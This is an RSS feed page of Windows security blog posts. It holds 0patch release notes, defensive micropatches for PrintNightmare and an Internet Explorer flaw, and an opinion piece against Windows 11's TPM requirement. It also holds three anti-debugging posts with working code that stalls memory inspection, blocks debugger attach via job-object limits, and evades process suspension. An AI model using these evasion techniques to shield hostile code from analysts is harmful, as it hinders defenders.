RSS Security

🔒
❌ About FreshRSS
There are new articles available, click to refresh the page.
Before yesterdayReverse Engineering

0patch Agent 21.05.05.10500 released

12 July 2021 at 16:20


 

Today we released a new version of 0patch Agent that fixes some issues reported by users or detected internally by our team. We always recommend keeping 0patch Agent updated to the latest version, as we only support the last couple of versions; not updating for a long time could lead to new patches no longer being downloaded and agent not being able to sync to the server properly. 

Enterprise users can update their agents centrally via 0patch Central; if their policies mandate automatic updating for individual groups, agents in such groups will get updated automatically.

Non-enterprise users will have to update 0patch Agents manually by logging in to computers with 0patch Agent and pressing "GET LATEST VERSION" in 0patch Console. We're still offering a free upgrade to Enterprise so any PRO user can request Enterprise features by contacting [email protected].

The latest 0patch Agent is always downloadable from https://dist.0patch.com/download/latestagent.


Release Notes


  • "Hash caching" was introduced to significantly reduce the amount of CPU and disk I/O operations when calculating cryptographic hashes of executable modules as these are loaded in running processes. Before, hash calculation was causing performance problems for some users on Citrix and Terminal Servers.
  • Huge log files are a thing of the past. We have implemented a mechanism to keep log sizes limited, with these limits configurable via registry.
  • 0patch Agent used to have the default Windows API behavior when it comes to using SSL/TLS versions, which was causing problems for users requiring TLS 1.1 or 1.2 on older Windows systems and required manual configuration. The new agent supports TLS 1.1 and 1.2 even on older systems such as Windows 7 or  Server 2008 R2 by default.
  • 0patch Console no longer crashes if launched while another instance of 0patch Console is already running. Now, launching a second 0patch Console puts the already running console in the foreground.
  • 0patch Console's registration form had "SIGN UP FOR A FREE ACCOUNT" and "FORGOT PASSWORD" links swapped. This has been corrected.
  • With 0patch FREE, some notifications occasionally failed to get closed and were left hovering indefinitely, making it impossible for users to reach the screen area behind them. This has been corrected.

 

An enormous THANK YOU to all users who have been reporting technical issues to our support team, some of you investing a lot of time in investigating problems and searching for solutions or workarounds. You helped us make our product better for everyone!

WARNING: We have users reporting that various anti-virus products seem to detect the new agent as malicious and block its installation or execution. Specifically, Kaspersky detects the MSI installer package as malicious (preventing installation and update), while Avast and AVG detect 0patchServicex64.exe as malicious (preventing proper functioning of the agent). We recommend marking these as false positives, restoring quarantined files and making an exception for these files if affected.


 

 

 

My talks @ BlackHat 2021 and DefCon29

3 July 2021 at 20:59
By: pi3

This year I’m going to present some amazing research on:

Both of them are really unusual and interesting topics 😉

If anyone is going to be in Las Vegas during BlackHat and/or DefCon this year and would like to grab a beer, just let me know!

Thanks,
Adam

Free Micropatches for PrintNightmare Vulnerability (CVE-2021-34527)

2 July 2021 at 13:34


by Mitja Kolsek, the 0patch Team


[Note: This blog post is expected to be updated as new micropatches are issued and new information becomes available.]

Update 7/16/2021: We've ported and issued our PrintNightmare patches for Windows computers that have July 2021 Windows Updates installed (which we do recommend). Our patches prevent exploitation of PrintNightmare even if computer settings render Microsoft's patch ineffective, as described by Will Dormann's diagram. These patches remain free for now.

Update 7/15/2021: July Patch Tuesday patches included the same PrintNightmare fix as the July 6 out-of-band Windows Update, with Microsoft stating that it properly resolves the vulnerability. As this diagram shows, two configuration options that aren't inherently security-related can make the system vulnerable to at least local - but likely also remote - attack, so we're going to port our patches to at least July Windows Updates while we continue to assess the situation. Since July Windows Updates also brought fixes for various other vulnerabilities, we recommend applying them to keep your computers fully up-to-date.

Update 7/7/2021: Microsoft has issued an out-of-band update for the PrintNightmare vulnerability, but the next day this update was found to be ineffective for both local and remote attack vectors. The update does, however, modify localspl.dll on the computer, which means that our existing patches stop getting applied to this module if the update is installed. In other words, if you used 0patch to protect your computers against PrintNightmare, applying the July 6 update from Microsoft makes you vulnerable again. Since we expect Microsoft to issue another modification to localspl.dll next week on Patch Tuesday, we decided not to port our patches to the July 6 version of localspl.dll but rather wait and see what happens next week. Consequently, we recommend NOT INSTALLING the July 6 Windows update if you're using 0patch.

Update 7/5/2021: Security researcher cube0x0 discovered another attack vector for this vulnerability, which significantly expands the set of affected machines. While the original attack vector was Print System Remote Protocol [MS-RPRN], the same attack delivered via Print System Asynchronous Remote Protocol [MS-PAR] does not require Windows server to be a domain controller, or Windows 10 machine to have UAC User Account Control disabled or PointAndPrint NoWarningNoElevationOnInstall enabled. Note that our patches for Servers 2019, 2016, 2012 R2 and 2008 R2 issued on 7/2/2021 are effective against this new attack vector and don't need to be updated.


Introduction

June 2021 Windows Updates brought a fix for a vulnerability CVE-2021-1675 originally titled "Windows Print Spooler Local Code Execution Vulnerability". As usual, Microsoft's advisory provided very little information about the vulnerability, and very few probably noticed that about two weeks later, the advisory was updated to change "Local Code Execution" to "Remote Code Execution".

This CVE ID would probably remain one of the boring ones without a surprise publication of a proof-of-concept for a remote code execution vulnerability called PrintNightmare, indicating that it was  CVE-2021-1675. Security researchers Zhiniang Peng and Xuefeng Li, who published this POC, believed that their vulnerability was already fixed by Microsoft, and saw other researchers slowly leaking details, so they decided to publish their work as well.

It turned out that PrintNightmare was not, in fact, CVE-2021-1675 - and the published details and POC were for a yet unpatched vulnerability that turned out to allow remote code execution on all Windows Servers from version 2019 back to at least version 2008, especially if they were configured as domain controllers.

The security community went scrambling to clear the confusion, identify conditions for exploitability, and find workarounds in absence of an official fix from Microsoft. Meanwhile, PrintNightmare started getting actively exploited, Microsoft has confirmed it to be a separate vulnerability to CVE-2021-1675, assigned it CVE-2021-34527, and recommended that affected users either disable the Print Spooler service or disable inbound remote printing.

In addition to Microsoft's recommendations, workarounds gathered from the community included removing Authenticated Users from the "Pre-Windows 2000 Compatible Access" group, and setting permissions on print spooler folders to prevent the attack.

All these mitigations can have unwanted and unexpected side effects that can break functionalities in production (1, 2, 3), some including those unrelated to printing.


Patching the Nightmare

 

Long story short, our team at 0patch has analyzed the vulnerability and created micropatches for different affected Windows versions, starting with those most critical and most widely used:


  1. Windows Server 2019 (updated with June 2021 Updates)
  2. Windows Server 2016 (updated with June 2021 Updates)
  3. Windows Server 2012 R2 (updated with June 2021 Updates)
  4. Windows Server 2008 R2 (updated with January 2020 Updates, no Extended Security Updates) 
  5. Windows 10 v21H1 (updated with June 2021 Updates)
  6. Windows 10 v20H2 (updated with June 2021 Updates)
  7. Windows 10 v2004 (updated with June 2021 Updates) 
  8. Windows 10 v1909 (updated with June 2021 Updates) 
  9. Windows 10 v1903 (updated with December 2020 Updates - latest before end of support)
  10. Windows 10 v1809 (updated with May 2021 Updates - latest before end of support)
  11. Windows 10 v1803 (updated with May 2021 Updates - latest before end of support)
  12. Windows 10 v1709 (updated with October 2020 Updates - latest before end of support)
  13. Windows 7 (updated with January 2020 Updates, no Extended Security Updates) 

 

[Note: Additional patches will be released as needed based on exploitability on different Windows platforms.]

Our micropatches prevent the APD_INSTALL_WARNED_DRIVER flag in dwFileCopyFlags of function AddPrinterDriverEx from bypassing the object access check, which allowed the attack to succeed. We believe that "install warned drivers" functionality is not a very often used one, and breaking it in exchange for securing Windows machines from trivial remote exploitation is a good trade-off.

Our PrintNightmare patch only contains one single instruction, setting the rbx register to 1 and thus forcing the execution towards the code block that performs said object access check.



MODULE_PATH "..\Affected_Modules\localspl.dll_10.0.19041.1052_64bit_Win10-20H2-u202106\localspl.dll"
PATCH_ID 622
PATCH_FORMAT_VER 2
VULN_ID 7153
PLATFORM win64

patchlet_start
    PATCHLET_ID 1
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0x8f5da
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 8
    
    code_start
        mov ebx, 1       
    code_end
patchlet_end

   


Or as we see it in IDA Pro (green code block is injected by 0patch, grey is the original code that had to be moved in order to inject a jmp instruction in its place to jump to the patch).



 

See our micropatch in action:



Micropatches for PrintNightmare will be free until Microsoft has issued an official fix. If you want to use them, create a free account at 0patch Central, then install and register 0patch Agent from 0patch.com. Everything else will happen automatically. No computer reboots will be needed.

Compatibility note: Some Windows 10 and Server systems exhibit occasional timeouts in the Software Protection Platform Service (sppsvc.exe) on a system running 0patch Agent. This looks like a bug in Windows Code Integrity mitigation that prevents a 0patch component to be injected in the service (which is okay) but sometimes also does a lot of seemingly meaningless processing that causes process startup to time out. As a result, various licensing-related errors can occur. The issue, should it occur, can be resolved by excluding sppsvc.exe from 0patch injection as described in this article.


Frequently Asked Questions


Q: Which Windows versions are affected by PrintNightmare?

Answer updated 7/15/2021: We believe Will Dormann's PrintNightmare diagram most accurately describes the conditions under which PrintNightmare is exploitable, and this applies to all Windows versions at least back to Windows 7 and Server 2008 R2.

We have previously thought that domain-joined computers were not vulnerable but this was likely because by joining a domain, firewall rules were set up that blocked remote exploitation until one started sharing a folder or a printer.

 

Q: How about Windows systems without June 2021 Windows Updates?

We believe that without June 2021 Windows Updates, all supported Windows systems, i.e., all servers from 2008 R2 up and all workstations from Windows 7 and up, are affected.


Q: What will happen with these micropatches when Microsoft issues their own fix for PrintNightmare?

[Update 7/15/2021: We recommend everyone continues applying regular Windows Updates, including specifically the July Patch Tuesday update.]

First off, we absolutely usually recommend you do install all available security updates from original vendors [Update 7/8/2021: For the first time ever we do NOT recommend installing the July 6 update if you're using 0patch. See the top of the article for more information].When Microsoft fixes PrintNightmare, their update will almost certainly replace localspl.dll, where the vulnerability resides, and where our micropatches are getting applied. Applying the update will therefore modify the cryptographic hash of this file, and 0patch will stop applying our micropatches to it. You won't have to do anything in 0patch (such as disabling a micropatch), this will all happen automatically by 0patch design.

When the official fix is available, our micropatches will stop being free, and will fall under the 0patch PRO license. This means that if you wish to continue using them (and many other micropatches that the PRO license includes), you will have to purchase the appropriate amount of licenses.

[Update 7/8/2021: We do not consider Microsoft's July 6 out-of-band updates to be a proper fix, so we're keeping our PrintNightmare patches free until they issue a correct fix.]


Q: I have installed 0patch but the PrintNightmare patch is not applied. Why?

The Print Spooler service doesn't initially load localspl.dll when you start it, so it's probably not loaded yet. When it's needed (e.g., when installing a new printer, probably also when you print, and certainly if you launch a PrintNightmare proof-of-concept or exploit against it), localspl.dll gets loaded, and patched by 0patch.

To be sure you have the correct version of localspl.dll, launch 0patch Console and open the PATCHES -> RELEVANT PATCHES tab. At least one PrintNightmare patch should be listed there.


Q: We have a lot of affected computers. How can we prepare for the next Windows 0day?

Obviously deploying 0patch in an enterprise production environment on a Friday afternoon is not something most organizations would find optimal. As with any enterprise software, we recommend testing 0patch with your existing software on a group of testing computers before deploying across your network. Please contact [email protected] for setting up a trial, and when the next 0day like this comes out, you'll be ready to just flip a switch in 0patch Central and go home for the weekend.


Credits

We'd like to thank Will Dormann of CERT/CC for behind-the-scenes technical discussion that helped us understand the issue and decide on the best way to patch it.


Please revisit this blog post for updates or follow 0patch on Twitter.

Windows 11: TPMs and Digital Sovereignty

28 June 2021 at 00:00

This article is an opinion held by a subset of members about the potential plan from Microsoft about their enforcement of a TPM to use Windows 11 and various features. This article will not go into great detail about all the good and bad of a TPM; there will be links at the end for you to continue your research, but it will go into the issues we see with enforcement. If you’re unfamiliar with what a TPM is or its general function we recommend taking a look at these links: What is a TPM?; TPM and Attestation.

As you may or may not have already noticed, many people are wondering about Microsoft’s new mandatory TPM 2.0 hardware requirement for Windows 11. If you look around the press releases, shallow technical documentation, and the myriad of buzzwords like “security,” “device health,” “firmware vulnerabilities,” and “malware,” you still haven’t received a straightforward answer as to why exactly you need this tech.

Part of system requirements from Microsoft

Many of you reading this article may have machines around the house or office you built from silicon that isn’t even seven years old. These still play today’s latest games without hiccup or issue, and unless you let your Grandma or 6-year old nephew on the machine recently, you likely don’t have malware either.

So, why do I suddenly need a TPM 2.0 device on my machine, then you ask? Well, the answer is quite simple. It’s not about you; it’s about them.

You see, the PC (emphasis on personal here) is in a way the last bastion of digital freedom you have, and that door is slowly closing. You need to only look at highly locked and controlled systems like consoles and phones to see the disparity.

Political affiliations aside, one can take the Wikileaks app removal from both the Apple store and Google play store as an excellent example of what the world looks like when your device controls you, instead of you controlling the device.

How does a TPM on my PC advance this agenda?

Twenty years ago, Microsoft set forth a goal of “trusted” computing called Palladium. While this technical goal has slowly but surely crept into Windows over the years, it has laid chiefly dormant because of critical missing infrastructure. This being that until recently, quite a large majority of consumer machines did not have a TPM, which you’ll learn later is a critical component to making Palladium work. And while we won’t deny that Bitlocker is excellent for if your device ever gets stolen, we will remind you that Microsoft always sold this tyranny to look great on the surface (no pun intended here).

When Palladium debuted, it was shot out of orbit by proponents of free and open software and back into hiding it went.

Comment about vendor withdrawal problem

So why is the TPM useful? The TPM (along with suitable firmware) is critical to measuring the state of your device - the boot state, in particular, to attest to a remote party that your machine is in a non-rooted state. It’s very similar to the Widevine L1 on Android devices; a third-party can then choose whether or not to serve you content. Everything will suddenly revolve around this “trust factor” of your PC. Imagine you want to watch your favorite show on Netflix in 4k, but your hardware trust factor is low? Too bad you’ll have to settle for the 720p stream. Untrusted devices could be watching in an instance of Linux KVM, and we can’t risk your pirating tools running in the background!

You might think that “It’s okay, though! I can emulate a TPM with KVM; the software already exists!” The unfortunate truth is that it’s not that simple. TPMs have unique keys burned in at manufacture time called Endorsement Keys, and these are unique per TPM. These keys are then cryptographically tied to the vendor who issued them, and as such, not only does a TPM uniquely identify your machine anywhere in the world, but content distributors can pick and choose what TPM vendors they want to trust. Sound familiar to you? It’s called Digital Rights Management, otherwise known as DRM.

Let’s not forget, Intel initially shipped the Pentium III with a built-in serial number unique per chip. Much the same initial fate as Palladium, it was also shot down by privacy groups, and the feature was subject to removal.

A common misunderstanding

There seems to be a lot misconceptions floating around in social media. In this section we’ll highlight one of them:

“I can patch the ISO or download one that removes the requirement.”

You can, sure. Windows and a majority of its components will function fine, similar to if you root your phone. Remember the part earlier, though, about 4k video content? That won’t be available to you (as an example). Whether it be a game or a movie, a vendor of consumable media decides what users they trust with their content. Unfortunately, without a TPM, you aren’t cutting it.

You’ve probably noticed that the marketing for this requirement is vague and confusing, and that’s intentional. It doesn’t do much for you, the consumer. However, it does set the stage for the future where Microsoft begins shipping their TPM on your processor. Enter Microsoft’s Pluton. The same technology is present in the Xbox. It would be an absolute dream come true for companies and vendors with special interests to completely own and control your PC to the same degree as a phone or the Xbox.

While the writers of this article will not deny that device attestation can bring excellent security for the standard consumers of the world, we cannot ignore that it opens the door to the restriction of user privacy and freedoms. It also paves the way to have the PC locked into a nice controllable cube for all the citizens to use.

You can see the wood for the trees here. When a company tells you that you need something, and it’s “for your own good,” and hey, they’re just on a humanitarian aid mission to save you from yourself, one should be highly skeptical. Microsoft is pushing this hard; we can even see them citing entirely dubious statistics. We took this one from The Verge:

“Microsoft has been warning for months that firmware attacks are on the rise. “Our Security Signals report found that 83 percent of businesses experienced a firmware attack, and only 29 percent are allocating resources to protect this critical layer,” says Weston.”

If you read into this link, you will find it cites information from Microsoft themselves, called “Security Signals,” and by the time you’re done reading it, you forgot how you got there in the first place. Not only is this statistic not factual, but successful firmware attacks are incredibly rare. Did we mention that a TPM isn’t going to protect you from UEFI malware that was planted on the device by a rogue agent at manufacture time? What about dynamic firmware attacks? Did you know that technologies such as Intel Boot Guard that have existed for the better part of a decade defend well against such attacks that might seek to overwrite flash memory?

Takeaway

We are here to remind you that the TPM requirement of Windows 11 furthers the agenda to protect the PC against you, its owner. It is one step closer to the lockdown of the PC. As Microsoft won the secure boot battle a decade ago, which is where Microsoft became the sole owner of the Secure Boot keys, this move also further tightens the screws on the liberties the PC gives us. While it won’t be evident immediately upon the launch of Windows 11, the pieces are moving together at a much faster pace.

We ask you to do your research in an age of increased restriction of personal freedom, censorship, and endless media propaganda. We strongly encourage you to research Microsoft’s future Pluton chip.

There are links provided below to research for yourself.

Micropatch for Another Remote Code Execution Issue in Internet Explorer (CVE-2021-31959)

14 June 2021 at 13:45

 


by Mitja Kolsek, the 0patch Team


June 2021 Windows Updates brought a fix for another "Exploitation More Likely" memory corruption vulnerability in Scripting Engine (CVE-2021-26419) discovered by Ivan Fratric of Google Project Zero, very similar to this vulnerability discovered also discovered by Ivan and patched in May.

Ivan published details and a proof-of-concept three days ago and we took these to reproduce the vulnerability in our lab and create a micropatch for it.

Since Microsoft's patch was available, we reviewed it and found their patch for it in function ByteCodeGenerator::EmitScopeObjectInit, which Ivan also identified as the source of the flaw. An initialization loop was added to this function to initialize all members of the PropertyID array.

Our micropatch is logically identical to Microsoft's:



MODULE_PATH "..\Affected_Modules\jscript9.dll_11.00.9600.19867_32bit\jscript9.dll"
PATCH_ID 614
PATCH_FORMAT_VER 2
VULN_ID 7138
PLATFORM win32
patchlet_start
    PATCHLET_ID 1
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0x10d189
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 0
    PIT jscript9.dll!0x10cf2d
    ; jscript9.dll!0x10cf2d -> SaveToPropIdArray
    
    code_start
        mov ecx, [ebp-0ch]  ;
get linked list
        mov eax, [ecx+0x28] ;
        mov esi, [eax+0x30] ;
       
    LOOP:
        test esi, esi       ; is there more of PropertyID array?
        jz END              ; if everything is initialized, jmp to
                            ; label END, else go into loop.

        mov ecx, [esi+20h]
        lea eax, [ebp-20h]  ; get struct Js::PropertyIdArray *
        push eax            ; struct Js::PropertyIdArray *
        push ebx            ; struct Symbol *
        mov edx, edi        ; struct FuncInfo *
        call PIT_0x10cf2d   ; call SaveToPropIdArray
        mov esi, [esi+18h]  ; next element in linked list
        jmp LOOP
       
    END:
    code_end
   

 

See the micropatch in action:




We'd like to thank  Ivan Fratric for sharing their analysis and POC, which allowed us to create this micropatch for Windows users without official security updates. We also encourage security researchers to privately share their analyses with us for micropatching.
 
This micropatch is immediately available to all 0patch users with a PRO license, and is already downloaded and applied on all online 0patch-protected Windows versions we've security-adopted:
 
  1. Windows 7 and Windows Server 2008 R2 without Extended Security Updates, 
  2. Windows 7 and Windows Server 2008 R2 with year 1 of Extended Security Updates.
  3. Windows 10 v1803
  4. Windows 10 v1809

To obtain the micropatch and have it applied on your computer(s) along with other micropatches included with a PRO license, create an account in 0patch Central, install 0patch Agent and register it to your account. Note that no computer restart is needed for installing the agent or applying/un-applying any 0patch micropatch. 

By the way, if your organization has Windows 10 v1803, Windows 10 v1809 or Office 2010 installations that stopped receiving security updates, and would like to continue using them, it could be useful to know we've security-adopted these for at least 12 months. To save time and money, and step into the age of reboot-less security patching, contact [email protected].

To learn more about 0patch, please visit our Help Center




 

Preventing memory inspection on Windows

24 May 2021 at 00:00

Have you ever wanted your dynamic analysis tool to take as long as GTA V to query memory regions while being impossible to kill and using 100% of the poor CPU core that encountered this? Well, me neither, but the technology is here and it’s quite simple!

What, Where, WTF?

As usual with my anti-debug related posts, everything starts with a little innocuous flag that Microsoft hasn’t documented. Or at least so I thought.

This time the main offender is NtMapViewOfSection, a syscall that can map a section object into the address space of a given process, mainly used for implementing shared memory and memory mapping files (The Win32 API for this would be MapViewOfFile).

1
2
3
4
5
6
7
8
9
10
11
NTSTATUS NtMapViewOfSection(
  HANDLE          SectionHandle,
  HANDLE          ProcessHandle,
  PVOID           *BaseAddress,
  ULONG_PTR       ZeroBits,
  SIZE_T          CommitSize,
  PLARGE_INTEGER  SectionOffset,
  PSIZE_T         ViewSize,
  SECTION_INHERIT InheritDisposition,
  ULONG           AllocationType,
  ULONG           Win32Protect);

By doing a little bit of digging around in ntoskrnl’s MiMapViewOfSection and searching in the Windows headers for known constants, we can recover the meaning behind most valid flag values.

1
2
3
4
5
6
7
8
/* Valid values for AllocationType */
MEM_RESERVE                0x00002000
SEC_PARTITION_OWNER_HANDLE 0x00040000
MEM_TOPDOWN                0x00100000
SEC_NO_CHANGE              0x00400000
SEC_FILE                   0x00800000
MEM_LARGE_PAGES            0x20000000
SEC_WRITECOMBINE           0x40000000

Initially I failed at ctrl+f and didn’t realize that 0x2000 is a known flag, so I started digging deeper. In the same function we can also discover what the flag does and its main limitations.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
// --- MAIN FUNCTIONALITY ---
if (SectionOffset + ViewSize > SectionObject->SizeOfSection &&
    !(AllocationAttributes & 0x2000))
    return STATUS_INVALID_VIEW_SIZE;

// --- LIMITATIONS ---
// Image sections are not allowed
if ((AllocationAttributes & 0x2000) &&
    SectionObject->u.Flags.Image)
    return STATUS_INVALID_PARAMETER;

// Section must have been created with one of these 2 protection values
if ((AllocationAttributes & 0x2000) &&
    !(SectionObject->InitialPageProtection & (PAGE_READWRITE | PAGE_EXECUTE_READWRITE)))
    return STATUS_SECTION_PROTECTION;

// Physical memory sections are not allowed
if ((Params->AllocationAttributes & 0x20002000) &&
    SectionObject->u.Flags.PhysicalMemory)
    return STATUS_INVALID_PARAMETER;

Now, this sounds like a bog standard MEM_RESERVE and it’s possible to VirtualAlloc(MEM_RESERVE) whatever you want as well, however APIs that interact with this memory do treat it differently.

How differently you may ask? Well, after incorrectly identifying the flag as undocumented, I went ahead and attempted to create the biggest section I possibly could. Everything went well until I opened the ProcessHacker memory view. The PC was nigh unusable for at least a minute and after that process hacker remained unresponsive for a while as well. Subsequent runs didn’t seem to seize up the whole system however it still took up to 4 minutes for the NtQueryVirtualMemory call to return.

I guess you could call this a happy little accident as Bob Ross would say.

The cause

Since I’m lazy, instead of diving in and reversing, I decided to use Windows Performance Recorder. It’s a nifty tool that uses ETW tracing to give you a lot of insight into what was happening on the system. The recorded trace can then be viewed in Windows Performance Analyzer.

Trace Viewed in Windows Performance Analyzer

This doesn’t say too much, but at least we know where to look.

After spending some more time staring at the code in everyone’s favourite decompiler it became a bit more clear what’s happening. I’d bet that it’s iterating through every single page table entry for the given memory range. And because we’re dealing with terabytes of of data at a time it’s over a billion iterations. (MiQueryAddressState is a large function, and I didn’t think a short pseudocode snippet would do it justice)

This is also reinforced by the fact that from my testing the relation between view size and time taken is completely linear. To further verify this idea we can also do some quick napkin math to see if it all adds up:

1
2
3
4
5
instructions per second (ips) = 3.8Ghz * ~8
page table entries      (n)   = 12TB / 4096
time taken              (t)   = 3.5 minutes

instruction per page table entry = ips * t / n = ~2000

In my opinion, this number looks rather believable so, with everything added up, I’ll roll with the current idea.

Minimal Example

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
// file handle must be a handle to a non empty file
void* section = nullptr;
auto  status  = NtCreateSection(&section,
                                MAXIMUM_ALLOWED,
                                nullptr,
                                nullptr,
                                PAGE_EXECUTE_READWRITE,
                                SEC_COMMIT,
                                file_handle);
if (!NT_SUCCESS(status))
    return status;

// Personally largest I could get the section was 12TB, but I'm sure people with more
// memory could get it larger.
void* base = nullptr;
for (size_t i = 46;  i > 38; --i) {
    SIZE_T view_size = (1ull << i);
    status           = NtMapViewOfSection(section,
                                          NtCurrentProcess(),
                                          &base,
                                          0,
                                          0x1000,
                                          nullptr,
                                          &view_size,
                                          ViewUnmap,
                                          0x2000, // <- the flag
                                          PAGE_EXECUTE_READWRITE);

    if (NT_SUCCESS(status))
        break;
}

Do note that, ideally, you’d need to surround code with these sections because only the reserved portions of these sections cause the slowdown. Furthermore, transactions could also be a solution for needing a non-empty file without touching anything already existing or creating something visible to the user.

Fin

I think this is a great and powerful technique to mess with people analyzing your code. The resource usage is reasonable, all it takes to set it up is a few syscalls, and it’s unlikely to get accidentally triggered.

Process on a diet: anti-debug using job objects

21 January 2021 at 00:00

In the second iteration of our anti-debug series for the new year, we will be taking a look at one of my favorite anti-debug techniques. In short, by setting a limit for process memory usage that is less or equal to current memory usage, we can prevent the creation of threads and modification of executable memory.

Job Object Basics

While job objects may seem like an obscure feature, the browser you are reading this article on is most likely using them (if you are a Windows user, of course). They have a ton of capabilities, including but not limited to:

  • Disabling access to user32 functionality.
  • Limiting resource usage like IO or network bandwidth and rate, memory commit and working set, and user-mode execution time.
  • Assigning a memory partition to all processes in the job.
  • Offering some isolation from the system by “upgrading” the job into a silo.

As far as API goes, it is pretty simple - creation does not really stand out from other object creation. The only other APIs you will really touch is NtAssignProcessToJobObject whose name is self-explanatory, and NtSetInformationJobObject through which you will set all the properties and capabilities.

1
2
3
4
5
6
7
8
NTSTATUS NtCreateJobObject(HANDLE*            JobHandle,
                           ACCESS_MASK        DesiredAccess,
                           OBJECT_ATTRIBUTES* ObjectAttributes);

NTSTATUS NtAssignProcessToJobObject(HANDLE JobHandle, HANDLE ProcessHandle);

NTSTATUS NtSetInformationJobObject(HANDLE JobHandle, JOBOBJECTINFOCLASS InfoClass,
                                   void*  Info,      ULONG              InfoLen);

The Method

With the introduction over, all one needs to create a job object, assign it to a process, and set the memory limit to something that will deny any attempt to allocate memory.

1
2
3
4
5
6
7
8
9
10
HANDLE job = nullptr;
NtCreateJobObject(&job, MAXIMUM_ALLOWED, nullptr);

NtAssignProcessToJobObject(job, NtCurrentProcess());

JOBOBJECT_EXTENDED_LIMIT_INFORMATION limits;
limits.ProcessMemoryLimit               = 0x1000;
limits.BasicLimitInformation.LimitFlags = JOB_OBJECT_LIMIT_PROCESS_MEMORY;
NtSetInformationJobObject(job, JobObjectExtendedLimitInformation,
                          &limits, sizeof(limits));

That is it. Now while it is sufficient to use only syscalls and write code where you can count the number of dynamic allocations on your fingers, you might need to look into some of the affected functions to make a more realistic program compatible with this technique, so there is more work to be done in that regard.

The implications

So what does it do to debuggers and alike?

  • Visual Studio - unable to attach.
  • WinDbg
    • Waits 30 seconds before attaching.
    • cannot set breakpoints.
  • x64dbg
    • will not be able to attach (a few months old).
    • will terminate the process of placing a breakpoint (a week or so old).
    • will fail to place a breakpoint.

Please do note that the breakpoint protection only works for pages that are not considered private. So if you compile a small test program whose total size is less than a page and have entry breakpoints or count it into the private commit before reaching anti-debug code - it will have no effect.

Conclusion

Although this method requires you to be careful with your code, I personally love it due to its simplicity and power. If you cannot see yourself using this, do not worry! You can expect the upcoming article to contain something that does not require any changes to your code.

New year, new anti-debug: Don’t Thread On Me

4 January 2021 at 00:00

With 2020 over, I’ll be releasing a bunch of new anti-debug methods that you most likely have never seen. To start off, we’ll take a look at two new methods, both relating to thread suspension. They aren’t the most revolutionary or useful, but I’m keeping the best for last.

Bypassing process freeze

This one is a cute little thread creation flag that Microsoft added into 19H1. Ever wondered why there is a hole in thread creation flags? Well, the hole has been filled with a flag that I’ll call THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE (I have no idea what it’s actually called) whose value is, naturally, 0x40.

To demonstrate what it does, I’ll show how PsSuspendProcess works:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
NTSTATUS PsSuspendProcess(_EPROCESS* Process)
{
  const auto currentThread = KeGetCurrentThread();
  KeEnterCriticalRegionThread(currentThread);

  NTSTATUS status = STATUS_SUCCESS;
  if ( ExAcquireRundownProtection(&Process->RundownProtect) )
  {
    auto targetThread = PsGetNextProcessThread(Process, nullptr);
    while ( targetThread )
    {
      // Our flag in action
      if ( !targetThread->Tcb.MiscFlags.BypassProcessFreeze )
        PsSuspendThread(targetThread, nullptr);

      targetThread = PsGetNextProcessThread(Process, targetThread);
    }
    ExReleaseRundownProtection(&Process->RundownProtect);
  }
  else
    status = STATUS_PROCESS_IS_TERMINATING;

  if ( Process->Flags3.EnableThreadSuspendResumeLogging )
    EtwTiLogSuspendResumeProcess(status, Process, Process, 0);

  KeLeaveCriticalRegionThread(currentThread);
  return status;
}

So as you can see, NtSuspendProcess that calls PsSuspendProcess will simply ignore the thread with this flag. Another bonus is that the thread also doesn’t get suspended by NtDebugActiveProcess! As far as I know, there is no way to query or disable the flag once a thread has been created with it, so you can’t do much against it.

As far as its usefulness goes, I’d say this is just a nice little extra against dumping and causes confusion when you click suspend in Processhacker, and the process continues to chug on as if nothing happened.

Example

For example, here is a somewhat funny code that will keep printing I am running. I am sure that seeing this while reversing would cause a lot of confusion about why the hell one would suspend his own process.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#define THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE 0x40

NTSTATUS printer(void*) {
    while(true) {
        std::puts("I am running\n");
        Sleep(1000);
    }
    return STATUS_SUCCESS;
}

HANDLE handle;
NtCreateThreadEx(&handle, MAXIMUM_ALLOWED, nullptr, NtCurrentProcess(),
                 &printer, nullptr, THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE,
                 0, 0, 0, nullptr);

NtSuspendProcess(NtCurrentProcess());

Suspend me more

Continuing the trend of NtSuspendProcess being badly behaved, we’ll again abuse how it works to detect whether our process was suspended.

The trick lies in the fact that suspend count is a signed 8-bit value. Just like for the previous one, here’s some code to give you an understanding of the inner workings:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
ULONG KeSuspendThread(_ETHREAD *Thread)
{
  auto irql = KeRaiseIrql(DISPATCH_LEVEL);
  KiAcquireKobjectLockSafe(&Thread->Tcb.SuspendEvent);

  auto oldSuspendCount = Thread->Tcb.SuspendCount;
  if ( oldSuspendCount == MAXIMUM_SUSPEND_COUNT ) // 127
  {
    _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
    KeLowerIrql(irql);
    ExRaiseStatus(STATUS_SUSPEND_COUNT_EXCEEDED);
  }

  auto prcb = KeGetCurrentPrcb();
  if ( KiSuspendThread(Thread, prcb) )
    ++Thread->Tcb.SuspendCount;

  _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
  KiExitDispatcher(prcb, 0, 1, 0, irql);
  return oldSuspendCount;
}

If you take a look at the first code sample with PsSuspendProcess it has no error checking and doesn’t care if you can’t suspend a thread anymore. So what happens when you call NtResumeProcess? It decrements the suspend count! All we need to do is max it out, and when someone decides to suspend and resume us, they’ll actually leave the count in a state it wasn’t previously in.

Example

The simple code below is rather effective:

  • Visual Studio - prevents it from pausing the process once attached.
  • WinDbg - gets detected on attach.
  • x64dbg - pause button becomes sketchy with error messages like “Program is not running” until you manually switch to the main thread.
  • ScyllaHide - older versions used NtSuspendProcess and caused it to be detected, but it was fixed once I reported it.
1
2
3
4
5
